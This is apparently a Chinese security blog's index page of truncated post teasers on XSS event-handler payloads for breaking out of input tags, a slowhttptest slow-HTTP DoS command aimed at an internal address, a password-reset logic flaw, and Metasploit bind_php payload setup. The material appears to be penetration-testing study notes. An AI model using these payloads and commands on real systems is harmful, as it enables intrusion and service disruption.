摘要:
倘若是在script、input标签当中,即可突破。Payload ' oninput=alert`1` // 当要在input中输入内容时触发事件' oninput=alert`1` ' 同上' onchange=alert`1` // 发生改变的时候触发该事件' onchange=alert`1 阅读全文
该文被密码保护。 阅读全文
摘要:
kali linux下有个神奇的工具叫“slowhttptest” 命令:slowhttptest -c 1000 -H -g -o slowhttp -i 10 -r 200 -t GET -u http://10.210.6.69:8081/nmc -x 24 -p 在进行慢速DOS攻击期间打开 阅读全文
摘要:
前话 感谢阿哲学长的分享。get到的新姿势。一般重置密码处大多要求验证邮箱或者手机号码。即可能导致如下漏洞 实例演示: 重置密码处抓包,然后post包如下图所示: 分析: 要知道URL处的电话号码跟数据包中的电话号码意义是不一样的,URL处的是发送验证码的电话号码,而数据包当中的是要修改的用户的电话 阅读全文
摘要:
感谢: perl6大佬分享的姿势。 MSF: msf > use payload/php/bind_phpmsf exploit(handler) > set PAYLOAD payload/php/bind_phpmsf exploit(handler) > set RHOST 目标内网ipmsf 阅读全文